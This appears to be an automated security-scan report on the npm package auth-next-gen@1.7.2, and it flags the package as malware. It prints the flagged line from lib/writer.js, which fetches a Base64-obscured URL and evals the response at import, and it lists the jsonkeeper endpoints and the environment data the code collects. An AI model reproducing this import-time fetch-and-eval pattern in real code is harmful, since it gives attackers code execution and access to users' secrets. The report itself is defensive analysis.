
auth-next-gen@1.7.2

auth-next-gen is a lightweight npm module that synchronizes authentication state between server-side rendered (SSR) pages and client-side applications.

AI Security Review

scanned 2h ago · by lpm-firewall-ai

The package executes remote code on normal import. The remote payload runs in a scope containing collected environment and host identifiers.

Static reason: One or more suspicious static signals were detected.
Trigger: require('auth-next-gen') or importing the package main index.js
Impact: Remote attacker-controlled code execution in the consumer process with access to environment variables and host metadata.
Mechanism: import-time fetch of remote JavaScript followed by eval
Attack narrative: On package import, index.js loads lib/writer.js. That module collects process.env plus host identity fields, then requests a Base64-obscured jsonkeeper URL and evals code from the response. This gives the remote endpoint arbitrary code execution inside the victim application's Node process and can use the collected data in scope.
Rationale: Static source inspection confirms concrete import-time remote code execution with environment and host data staged in scope, hidden behind obfuscated endpoint strings. This is not package-aligned functionality for an SSR auth helper and warrants blocking.
Evidence: package.json, index.js, lib/writer.js
Network endpoints (2):
  • www.jsonkeeper.com/b/GS6NQ
  • www.jsonkeeper.com/b/HY6M6

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json main is index.js; there is no lifecycle hook, but the normal import entrypoint runs the code.
  • index.js requires ./lib/writer at top level, so importing the package runs writer.js immediately.
  • lib/writer.js builds a data object from process.env, hostname, username, platform, and MAC addresses.
  • lib/writer.js fetches a Base64-hidden URL and evals r.data.data from the response.
  • lib/writer.js contains additional obfuscated hex strings for axios/get/jsonkeeper/then.
Evidence against
  • No install/preinstall/postinstall script in package.json.
  • No file writes, persistence hooks, or AI-agent control-surface mutations found in inspected package files.
Behavioral surface
Source: Child Process, Environment Vars, Eval, Network
Supply chain: High Entropy Strings, Url Strings
Manifest: No manifest risk signals triggered.
scanned 17 file(s), 52.8 KB of source, external domains: github.com

Source & flagged code

4 flagged
lib/writer.js (L28-L30)
L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);});
High
Eval

Package source references dynamic code evaluation.

lib/writer.js · L28

lib/writer.js (L20-L30)
L20: const data = {
L21:   ...process.env,
L22:   version: pkg.subModuleVersion,
...
L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);});
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/writer.js · L20

lib/writer.js (L28-L30)
L29: require('axios').get(atob("[redacted]==")).then(r => {eval(r.data.data);});
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/writer.js · L28

docs/transports.md (L550)
patternName = generic_password, severity = medium, line = 550, matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.md · L550

Findings

4 High, 3 Medium, 3 Low
High: Child Process
High: Eval (lib/writer.js)
High: Same File Env Network Execution (lib/writer.js)
High: Base64 Obscured Url (lib/writer.js)
Medium: Network
Medium: Environment Vars
Medium: Secret Pattern (docs/transports.md)
Low: Scripts Present
Low: High Entropy Strings
Low: Url Strings